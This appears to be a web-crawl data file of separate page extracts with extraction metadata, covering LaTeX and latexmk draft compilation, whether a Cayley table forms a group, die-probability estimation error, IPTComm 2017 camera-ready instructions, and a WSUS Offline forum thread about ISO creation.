top of a page, so this space will be discarded. Actually, also the space below will not be added, in this case, because a section title follows and LaTeX chooses the maximum between the predefined spaces below the environment and above the section title. \begin{document} \begin{flushleft} name \\ class \\ date \end{flushleft} ## Fourth (and preferred) way \newcommand{\authordata}[3]{{\raggedright #1\\#2\\#3\par}} \begin{document} \authordata {name} {class} {date} This way abstracts the input of the data, so you're free to change how it will appear by just changing the definition. For instance a simple addition of \large\bfseries will make the data more prominent: \newcommand{\authordata}[3]{{\large\bfseries\raggedright #1\\#2\\#3\par}} Many variations are possible, without ever touching what is after \begin{document}.
2014-08-21 10:30:35
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9016976952552795, "perplexity": 2072.9129854705316}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2014-35/segments/1408500815861.64/warc/CC-MAIN-20140820021335-00013-ip-10-180-136-8.ec2.internal.warc.gz"}
https://tex.stackexchange.com/questions/212657/compile-a-document-as-draft-for-the-first-few-times-and-then-non-draft-in-the
# Compile a document as “draft” for the first few times and then non-draft in the final round I'm working on a big document in which there are many images. Usually, I compile it with latexmk and it works quite well. But: with all these images it's quite slow when compiling. Is it somehow possible to compile it as a draft for the first few rounds and then as a non-draft, so the images are ignored the first few times and properly included in the last round, without editing the file inbetween? That would save quite a lot of time. • arara should be the right tool for this, right @PauloCereda? – percusse Nov 17 '14 at 19:53 • Have you tried the `draft` option to `\includegraphics`? – sgmoye Nov 17 '14 at 20:57 • I don't see how the `\includegraphics`-`draft` would help me here. Before compiling the last time, I'd need to remove that code parts again. My idea is to run everything in draft-mode except for the last run or so. And I have never heard of arara, how would that help me here? thanks. – Perik Onti Nov 17 '14 at 21:18 • @PerikOnti `draft` may change several aspects of the typesetting, depending on which packages you load, so just the final run without it may not be sufficient. The `draft` option should be only to `graphicx`. It's an interesting question anyway. – egreg Nov 17 '14 at 22:11 • do you mean you are running latex multiple times after each edit? if so why? If you are editing between latex runs why is adding/removing `[draft]` a problem? – David Carlisle Nov 17 '14 at 22:11 Note that `latexmk` can't know which LaTeX run will be the last, so you will need to run it twice. The first time call it like ``````latexmk -pdf -pdflatex="pdflatex %O '\PassOptionsToPackage{draft}{graphicx}\input{%S}'" <filename> `````` and the second time just with ``````latexmk -pdf -g <filename> `````` In the document you'll just have `\usepackage{graphicx}`. In my test, just one run is performed with the second command.
2021-03-04 22:49:09
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8054361343383789, "perplexity": 1432.6705517083797}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-10/segments/1614178369523.73/warc/CC-MAIN-20210304205238-20210304235238-00411.warc.gz"}
http://mathhelpforum.com/advanced-algebra/153767-inverse-element-group.html
# Math Help - Inverse of an element in a group 1. ## Inverse of an element in a group Let $G$ be a group. Then (a) $G$ has a unique identity, and (b) each element in $G$ has a unique inverse. The table below shows an abelian group with $3$ elements: $\begin{tabular}{lccr} *&a&b&c\\ \cline{2-4}a&a&b&c\\ b&b&c&c\\ c&c&a&b \end{tabular}$ I can see the identity is show on the first row and column, but I don't see the inverse of each elements. Does it mean that the inverses are not in the group? 2. Originally Posted by novice (b) each element in $G$ has a unique inverse. You are correct, each element does not have an inverse, therefore $G$ is not a group. 3. Originally Posted by novice The table below shows an abelian group with $3$ elements: $\begin{tabular}{lccr} *&a&b&c\\ \cline{2-4}a&a&b&c\\ b&b&c&c\\ c&c&a&b \end{tabular}$ Also $bc \neq cb \implies G$ does not commute. 4. Let $G$ be group. Would it look like this: $G=\{e, 1/a, a, 1/b, b,...\}$ provided that $G$ is associative and commutative? 5. Originally Posted by novice Let $G$ $G=\{e, 1/a, a, 1/b, b,...\}$ provided that $G$ is associative and commutative? I don't think so as $a=e$ and the inverses $a^{-1},b^{-1}, c^{-1}$ are not listed in the make up. You would need a rule linking the other elements. 6. Originally Posted by novice Let $G$ be group. Would it look like this: $G=\{e, 1/a, a, 1/b, b,...\}$ provided that $G$ is associative and commutative? A group (G, *) is always associative by definition, but not always commutative. It is commutative if and only if it is abelian, by definition. In general the inverse of $\displaystyle a$ is denoted $\displaystyle a^{-1}$. Also keep in mind that it's possible to have $\displaystyle a=a^{-1}$, so your enumeration of the set above could have duplicates. There would also be duplicates if you listed a pair of inverses twice, for example if $\displaystyle a = b^{-1}$. 7. I see. No wonder $a*b=b$. 8. Originally Posted by undefined In general the inverse of $\displaystyle a$ is denoted $\displaystyle a^{-1}$. Also keep in mind that it's possible to have $\displaystyle a=a^{-1}$, so your enumeration of the set above could have duplicates. There would also be duplicates if you listed a pair of inverses twice, for=e, where e is an indentity of (G,*) example if $\displaystyle a = b^{-1}$. So if $G$ is a group, the inverse of each element is in $(G,*)$. Yah? 9. Yes, by definition of a group. 10. Originally Posted by novice Let $G$ be a group. Then (a) $G$ has a unique identity, and (b) each element in $G$ has a unique inverse. The table below shows an abelian group with $3$ elements: $\begin{tabular}{lccr} *&a&b&c\\ \cline{2-4}a&a&b&c\\ b&b&c&c\\ c&c&a&b \end{tabular}$ I can see the identity is show on the first row and column, but I don't see the inverse of each elements. Does it mean that the inverses are not in the group? A quick check to see that this is not a group is to note that in each row and column of the Cayley table every element must occur. This reflects the fact that one can get from each element of a group to every other, for example one can get to $c$ from $a$ by (post-)multiplying $a$ by $a^{-1}c$.
2015-11-26 04:10:45
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 41, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8492230772972107, "perplexity": 252.86014862418756}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2015-48/segments/1448398446300.49/warc/CC-MAIN-20151124205406-00113-ip-10-71-132-137.ec2.internal.warc.gz"}
https://stats.stackexchange.com/questions/198278/error-of-empirical-probability-for-unfair-die?noredirect=1
# Error of empirical probability for unfair die I roll an unfair $256$-sided die $n$ times ($n > 1'000'000$) and count the rolled numbers in a histogram. I then calculate the empirical probabilities ${p_e}_i$ for $i=1, ..., 256$ by taking the histogram values divided by $n$. What is the expected error $e = E(({p_e}_i - {p_t}_i)^2)$, where ${p_t}_i$ is the unknown true probability of landing with side $i$ facing up? If it matters you can assume that $0.5 / 256 < {p_t}_i < 2 / 256$. There is a related question, but applying the answer gives me nonsensical results (such as the error increasing with $n$ when it should be decreasing). I expect the convergence ${p_e}_i \to {p_t}_i$ and $e \to 0$ for $n \to \infty$. In general for a random variable $X$ with $\sigma^2 \equiv \text{Var}(X)$ the sample mean $\bar{X}$ has variance $\sigma^2 / n$ when our samples are uncorrelated (this follows from the basic properties of variance). In our case $X$ follows a Bernoulli distribution with some success probability $p$ (the chance that the given side comes up after we roll the die) and this distribution has variance $p (1 - p)$ (to see this simply note that $\text{Var}(X) = \text{E}(X^2) - \text{E}(X)^2 = p - p^2 = p(1 - p)$ since $X = X^2$) so the sample proportion has variance $p(1 - p) / n$. However, we don't know what $p$ is, but we can use the fact that $p(1 - p)$ increases over $[0, 1/2)$ along with your condition to get the following upper bound \begin{align} \text{Var} (\bar{X}) &\leq \frac{2/256(1 - 2/256)}{n} \\ &= \frac{508}{65536 n} . \end{align} You can use this idea to choose $n$ so as to guarantee that the variance is smaller than any $\epsilon > 0$ you like. • Since all the true probabilities are known and small, this would seem to be a gross overestimate. – whuber Feb 24 '16 at 19:48 • @whuber I think the original post indicates the probabilities aren't known except that they're within some range. – dsaxton Feb 24 '16 at 20:48 • (+1) Ah, I see you're right--I skimmed over that crucial word "unknown" in the question! – whuber Feb 24 '16 at 21:47 • I have been trying to apply your answer, but something doesn't work out. Say I want to know $p$ with an error of $\sqrt{\text{Var}(\bar{X})} = 0.01$. Solving for $n$ gives $n=10000 \cdot {508 \over 65536} = 77.5$. Approximating the probability of each side of a $256$-sided die with an expected error of $<0.01$ in $78$ rolls is impossible. What did I do wrong? – nwp Feb 25 '16 at 17:12 • I'm not sure how you got that value for $n$, but notice by looking at the upper bound that the variance is always smaller than $0.01$. For fixed $\epsilon$ solve the inequality $508 / 65536n \leq \epsilon$ for $n$ to get an appropriate sample size that bounds the variance from above by $\epsilon$. – dsaxton Feb 25 '16 at 17:25 let p be the specific $p_i$ The probability estimated is just the number of i's over n so $p_{ei}$ is just $n_{ei}$ / n $$E( ( p_{ei} – p_{ti} )^2 ) = E( ( n_{ei} / n – p )^2 )$$ mulitply inside by n^2 and outside by 1/n^2 $$E( ( p_{ei} – p_{ti} )^2 ) = \frac{1}{n^2} * E( ( n * n_{ei} / n – n * p )^2 )$$ The number observed $n_{ei}$ follows the binomial distribution $$E( ( p_{ei} – p_{ti} )^2 ) = \frac{1}{n^2} * \sigma_{binomial}^2$$ $$\sigma_{binomial}^2 = n p(1-p)$$ $$E( ( p_{ei} – p_{ti} )^2 ) = \frac{1}{n^2} n p (1-p)$$ $$E( ( p_{ei} – p_{ti} )^2 ) = \frac{p(1-p)}{n}$$ • It seems you begin with such a strong simplifying assumption that the answer becomes almost trivial. Presumably, by indexing the probabilities the question wants to address the case where they substantially vary. Did I misunderstand what you mean by "let $p$ be the specific $p_i$"? – whuber Feb 24 '16 at 19:39 • Ahhh, yes I was just calculating it for some p_i which I denoted p for simplicity. But if the question is the expected value for all pei-pti's then I think it would just be the weighted average of pi(1-pi)/ni where n is the number of times the value i came up and pi is the real probability thereof. – MikeP Feb 24 '16 at 20:49 • I'm not sure myself. I did notice there is no summation in the question, suggesting this problem may reduce to a straightforward Binomial calculation, as you point out. Maybe @nwp will clear this up for us with a comment or edit. – whuber Feb 24 '16 at 21:48 • @whuber There is no summation besides counting the rolls in the histogram. I suppose one could look at a specific die side, model the probability through a binomial distribution and arrive at $e = {p(1-p) \over n}$. Can I use the experimental ${p_e}_i$ instead of the true ${p_t}_i$ for that? If so this would be the answer. I do feel like information is lost by not using $\sum_{i=1}^{256} {p_e}_i = \sum_{i=1}^{256} {p_t}_i = 1$, but it should be close enough. – nwp Feb 24 '16 at 22:05 • Actually, no information is lost at all. This is because expectations are linear. By trying to use the experimental value you would be substantially changing your question. Currently, you are asking for a mathematical result: the expectation of a specified random variable (which happens to have a Binomial distribution). (The answer would, of course, be expressed in terms of the unknown probability.) By using the empirical probability you would turn it into a statistical question: how to estimate the expectation. Either form of the question has many answers elsewhere on this site. – whuber Feb 24 '16 at 22:08
2019-09-21 15:38:18
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 1, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9423457980155945, "perplexity": 269.49267129903274}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-39/segments/1568514574532.44/warc/CC-MAIN-20190921145904-20190921171904-00374.warc.gz"}
http://iptcomm.org/camera-ready.html
#### Due date: Tuesday, Sep 5 2017 Step 1. All authors of accepted papers must prepare camera-ready versions and copyright form as outlined below. Camera-ready papers must be checked through IEEE PDF eXpress. Instructions on this are given below. The camera-ready papers and signed copyright form MUST be uploaded to the EDAS IPTComm website by Tuesday, Sep-05-2017. If you run into any problems, please contact tpc@iptcomm.org and chair@iptcomm.org. The LaTeX and MS-Word templates for the camera-ready papers are at http://origin.www.ieee.org/conferences_events/conferences/publishing/templates.html Step 2. All authors must include a copyright clearance code at the bottom of the first page of the camera-ready paper. The copyright code should be one of the following four, depending on the domicile of the authors: • For papers in which all authors are employed by the US government, the copyright notice is: U.S. Government work not protected by U.S. copyright • For papers in which all authors are employed by a Crown government (UK, Canada, and Australia), the copyright notice is: 978-1-5386-1322-1/17/$31.00 ©2017 Crown • For papers in which all authors are employed by the European Union, the copyright notice is: 978-1-5386-1322-1/17/$31.00 ©2017 European Union • For all other papers the copyright notice is: 978-1-5386-1322-1/17/$31.00 ©2017 IEEE Latex users can add the following line for the copyright notice to show up: \IEEEoverridecommandlockouts \IEEEpubid{\makebox[\columnwidth]{978-1-5386-1322-1/17/\$31.00~\copyright{}2017 IEEE \hfill} \hspace{\columnsep}\makebox[\columnwidth]{ }} MSWord users can use: "Insert" + "Text box" and insert the appropriate copyright notice in the texbox, and place the box (without border) at the bottom left on the first page. Step 3: Authors must fill out the IEEE copyright form. This form must be uploaded to the IPTComm EDAS website along with the camera-ready paper. Step 4: All camera-ready papers MUST pass the IEEE PDF eXpress check. Please go to IEEE PDF exPress and create an account if you do not have one. The Conference ID to use for IPTComm 2017 is: 41601X. Please make sure that PDF eXpress does not issue any errors for your camera- ready manuscript. Instructions on using PDF eXpress are provided by IEEE on the IEEE PDF eXpress page referenced above. Step 5: The camera-ready paper and signed copyright form MUST be uploaded to the IPTComm EDAS website by Tue, Sep-05-2017 to be included in IEEE Xplore proceedings. If you have any questions or run into problems, please contact tpc@iptcomm.org or chair@iptcomm.org.
2017-09-21 17:23:41
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.4443938732147217, "perplexity": 4295.447235835628}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-39/segments/1505818687834.17/warc/CC-MAIN-20170921172227-20170921192227-00429.warc.gz"}
http://forums.wsusoffline.net/viewtopic.php?f=9&t=2053&start=10&view=print
Page 2 of 2 ### Re: CreateIsoImage.sh excludes the dotnet 4.0 files. Posted: 09.09.2011, 06:59 I think that can fix the problem (haven't tried it yet, but seems logical). The only thing missing was the dotnet installer( previously I forgot to check inside dotnet/glb folder, so sorry for that). How can I check which build I am running? The only thing it tells is I am running v6.9. Also how to download the latest version from trac (I have never worked with trac before, only have used git and mercurial) ? ### Re: CreateIsoImage.sh excludes the dotnet 4.0 files. Posted: 09.09.2011, 09:16 ### Re: CreateIsoImage.sh excludes the dotnet 4.0 files. Posted: 09.09.2011, 09:37 An additional hint: After downloading the trunk, you should do the preparatory steps described at the beginning of this thread. This is mainly for compiling the AutoIt scripts. However, the batch files for doing so are for Windows. ### Re: CreateIsoImage.sh excludes the dotnet 4.0 files. Posted: 09.09.2011, 18:59 The AutoIt scripts are only for Windows, I think. ### Re: CreateIsoImage.sh excludes the dotnet 4.0 files. Posted: 09.09.2011, 23:53 Shure, but at least the Update Installer must be compiled, because it is used for updating Windows later on. ### Re: CreateIsoImage.sh excludes the dotnet 4.0 files. Posted: 11.09.2011, 11:23 Correct. ### Re: CreateIsoImage.sh excludes the dotnet 4.0 files. Posted: 12.09.2011, 10:30 You don't need to compile anything, just replace all files in your \exclude subdirectory with the corresponding files from the trunkbuild.
2019-11-17 20:23:36
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9158084392547607, "perplexity": 13863.077842112098}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-47/segments/1573496669276.41/warc/CC-MAIN-20191117192728-20191117220728-00401.warc.gz"}